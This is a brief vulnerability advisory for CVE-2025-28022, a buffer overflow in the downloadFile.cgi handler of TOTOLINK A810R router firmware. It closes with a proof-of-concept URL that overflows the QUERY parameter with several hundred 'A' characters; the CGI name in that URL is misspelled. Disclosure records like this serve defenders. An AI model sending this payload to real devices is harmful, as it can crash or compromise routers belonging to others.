[CVE-ID]
CVE-2025-28022
[PRODUCT]
TOTOLINK
[Vendor of Product]
[VERSION]
V4.1.2cu.5182_B20201026
[Firmware]
https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/166/ids/36.html
[Vulnerability Type]
BufferOverflow
[Description]
TOTOLINK A810R V4.1.2cu.5182_B20201026 was found to contain a buffer overflow vulnerability in the downloadFile.cgi
The v25 parameter's data source is user-controlled input from v14. In the code, the user-controllable v4 is copied into v26 without any filtering or size restrictions, ultimately resulting in a buffer overflow vulnerability. For example, consider the payload format: payload=aaa....aaa/bbb...bbb/ccc...ccc. If the "aaa...aaa" section exceeds 256 bytes, it will trigger the buffer overflow condition.
[POC]
<http://IP/cgi-bin/downloadFlile.cgi?QUERY=aaaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/bbbbbb/cccccc>